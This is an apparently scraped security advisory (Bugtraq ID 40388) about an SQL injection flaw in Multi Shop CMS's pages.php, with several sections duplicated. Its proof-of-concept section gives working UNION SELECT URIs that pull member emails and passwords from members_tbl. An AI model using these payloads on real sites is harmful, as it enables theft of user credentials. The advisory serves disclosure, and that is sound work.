Multi Shop CMS 'pages.php' SQL Injection Vulnerability
BID:40388
Info
Multi Shop CMS 'pages.php' SQL Injection Vulnerability
| Bugtraq ID: | 40388 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 26 2010 12:00AM |
| Updated: | May 26 2010 12:00AM |
| Credit: | Newbie_Campuz |
| Vulnerable: |
Multi Shop CMS Multi Shop CMS 0 |
| Not Vulnerable: | |
Discussion
Multi Shop CMS 'pages.php' SQL Injection Vulnerability
Multi Shop CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Multi Shop CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Multi Shop CMS 'pages.php' SQL Injection Vulnerability
An attacker can exploit this issue through a browser.
The following example URIs are available:
http://www.example.com/pages.php?id=-9999+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--
http://www.example.com/pages.php?id=7+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--
An attacker can exploit this issue through a browser.
The following example URIs are available:
http://www.example.com/pages.php?id=-9999+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--
http://www.example.com/pages.php?id=7+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--
Solution / Fix
Multi Shop CMS 'pages.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multi Shop CMS 'pages.php' SQL Injection Vulnerability
References:
References:
- Multi Shop CMS Homepage (Multi Shop CMS)